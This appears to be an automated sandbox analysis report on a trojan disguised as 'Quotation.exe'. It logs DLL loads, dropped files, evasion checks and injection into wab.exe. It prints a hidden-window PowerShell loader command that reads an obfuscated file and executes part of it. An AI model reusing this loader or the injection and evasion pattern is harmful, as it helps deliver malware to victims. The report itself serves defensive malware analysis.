Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_089BCDE0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_089BB540
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_089BAD40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_089B3EB0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_089B9640
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_089B07C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_089EC9A8
Source: Quotation.exe | Static PE information: invalid certificate
Source: Quotation.exe, 00000000.00000000.1124757872.0000000000489000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilename: slammen endpoints.exeB vs Quotation.exe
Source: Quotation.exe | Binary or memory string: OriginalFilename: slammen endpoints.exeB vs Quotation.exe
Source: Quotation.exe.2.dr | Binary or memory string: OriginalFilename: slammen endpoints.exeB vs Quotation.exe
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: riched20.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: usp10.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: msls31.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: webio.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: wininet.dll
      Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: iertutil.dll
      Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: sspicli.dll
      Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: windows.storage.dll
      Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: wldp.dll
      Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: profapi.dll
      Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: kernel.appcore.dll
      Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: ondemandconnroutehelper.dll
      Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: winhttp.dll
      Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: mswsock.dll
      Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: iphlpapi.dll
      Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: winnsi.dll
      Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: urlmon.dll
      Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: srvcli.dll
      Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: netutils.dll
      Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: dnsapi.dll
      Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: rasadhlp.dll
      Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: fwpuclnt.dll
      Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: schannel.dll
      Source: Quotation.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engine | Classification label: mal96.troj.winEXE@9/16@1/2
      Source: C:\Users\user\Desktop\Quotation.exe | File created: C:\Users\user\Pictures\Ritualiseringen226.ini
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:396:120:WilError_03
      Source: C:\Users\user\Desktop\Quotation.exe | File created: C:\Users\user\AppData\Local\Temp\nsf27D7.tmp
      Source: Quotation.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
      Source: C:\Users\user\Desktop\Quotation.exe | File read: C:\Users\desktop.ini
      Source: C:\Users\user\Desktop\Quotation.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: Quotation.exe | ReversingLabs: Detection: 58%
      Source: Quotation.exe | Virustotal: Detection: 15%
      Source: C:\Users\user\Desktop\Quotation.exe | File read: C:\Users\user\Desktop\Quotation.exe
      Source: unknown | Process created: C:\Users\user\Desktop\Quotation.exe "C:\Users\user\Desktop\Quotation.exe"
      Source: C:\Users\user\Desktop\Quotation.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -windowstyle hidden "$Betalingsdages=Get-Content 'C:\Users\user\AppData\Local\Temp\springvandenes\Intransparency\Bowleres.Hed';$Taplet=$Betalingsdages.SubString(58707,3);.$Taplet($Betalingsdages)"
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
      Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
      Source: C:\Users\user\Desktop\Quotation.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -windowstyle hidden "$Betalingsdages=Get-Content 'C:\Users\user\AppData\Local\Temp\springvandenes\Intransparency\Bowleres.Hed';$Taplet=$Betalingsdages.SubString(58707,3);.$Taplet($Betalingsdages)"
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
      Source: C:\Users\user\Desktop\Quotation.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
      Source: Window Recorder | Window detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
      Source: Quotation.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: ystem.Core.pdb | source: powershell.exe, 00000002.00000002.2094251518.0000000008BCE000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdbl | source: powershell.exe, 00000002.00000002.2090205765.00000000076A3000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 | source: powershell.exe, 00000002.00000002.2083067727.0000000003231000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdb | source: powershell.exe, 00000002.00000002.2083067727.000000000320F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdbk | source: powershell.exe, 00000002.00000002.2083067727.000000000320F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb | source: powershell.exe, 00000002.00000002.2083067727.0000000003231000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ws\System.Core.pdbE | source: powershell.exe, 00000002.00000002.2094251518.0000000008BCE000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      Source: Yara match | File source: 0000000E.00000002.2383373007.0000000005D2E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000002.00000002.2098766772.000000000D38C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
      Source: C:\Users\user\Desktop\Quotation.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -windowstyle hidden "$Betalingsdages=Get-Content 'C:\Users\user\AppData\Local\Temp\springvandenes\Intransparency\Bowleres.Hed';$Taplet=$Betalingsdages.SubString(58707,3);.$Taplet($Betalingsdages)"
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_050B1CF7 pushad ; ret 2_2_050B1D01
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_050B3FB1 push ecx; retf 2_2_050B4005
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_083F8A06 push FFFFFF8Bh; iretd 2_2_083F8A08
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_08899C47 push FFFFFF8Bh; retf 2_2_08899C4C
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0889DDCA push FFFFFF8Bh; iretd 2_2_0889DDCE
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0889E5C0 push eax; retf 2_2_0889E5C9
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0889E5D2 push eax; retf 2_2_0889E5D4
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0889E2B1 push eax; retf 2_2_0889E2BA
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0889E2C3 push eax; retf 2_2_0889E2C5
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0889DE15 push FFFFFF8Bh; iretd 2_2_0889DE1A
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0889EBCD push eax; retf 2_2_0889EBD6
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0889EBDF push eax; retf 2_2_0889EBE1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_089A9DDE push FFFFFF8Bh; iretd 2_2_089A9DE0
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_089A9D31 push FFFFFF8Bh; iretd 2_2_089A9D33
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_089A9E8B push FFFFFF8Bh; iretd 2_2_089A9E8D
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_089A6E60 push eax; mov dword ptr [esp], edx 2_2_089A7044
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_089A9FDF push FFFFFF8Bh; iretd 2_2_089A9FE7
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_089A9F38 push FFFFFF8Bh; iretd 2_2_089A9F3A
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_089AA038 push FFFFFF8Bh; iretd 2_2_089AA03A
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_089B488D push 8B061F55h; iretd 2_2_089B4892
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_089B4ABF push 8B061E9Bh; iretd 2_2_089B4AC4
      Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_05D30DD8 push ebp; ret 14_2_05D30DD9
      Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_05D2F3E9 push esi; retf 14_2_05D2F3EA
      Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_05D3115E push ebp; ret 14_2_05D3115F
      Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_05D2FB47 push edi; retf 14_2_05D2FB49
      Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_05D2F166 push esi; retf 14_2_05D2F16A
      Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_05D32165 push ebp; ret 14_2_05D3216F
      Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_05D326DC push ebp; ret 14_2_05D326DD
      Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_05D300F8 push ebp; ret 14_2_05D300F9
      Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_05D2F2E9 push esi; retf 14_2_05D2F2EA
      Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_05D320EE push ebp; ret 14_2_05D3216F
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\springvandenes\Udstiller48\Kulmuler\Generationsskifternes\Specialudvalg\Quotation.exe (dropped file)
      Source: C:\Users\user\Desktop\Quotation.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2400
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7466
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6188 | Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 6352 | Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
      Source: C:\Program Files (x86)\Windows Mail\wab.exe | Last function: Thread delayed
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_050BF7D8 GetSystemInfo, 2_2_050BF7D8
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
      Source: C:\Users\user\Desktop\Quotation.exe | File opened: C:\Users\user
      Source: C:\Users\user\Desktop\Quotation.exe | File opened: C:\Users\user\AppData\Roaming
      Source: C:\Users\user\Desktop\Quotation.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
      Source: C:\Users\user\Desktop\Quotation.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
      Source: C:\Users\user\Desktop\Quotation.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts
      Source: C:\Users\user\Desktop\Quotation.exe | File opened: C:\Users\user\AppData
      Source: svchost.exe, 00000005.00000002.2389702012.000002213063F000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 00000005.00000002.2393836683.0000022135C57000.00000004.00000020.00020000.00000000.sdmp; wab.exe, 0000000E.00000003.1781787171.0000000006EFC000.00000004.00000020.00020000.00000000.sdmp; wab.exe, 0000000E.00000003.2112888645.0000000006F00000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
      Source: svchost.exe, 00000005.00000002.2388876888.000002213062F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWP8d0!
      Source: wab.exe, 0000000E.00000003.1781879858.0000000006EAD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process queried: DebugPort
      Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process queried: DebugPort
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_08356CA0 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk, 2_2_08356CA0
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3C60000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 275FFB4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
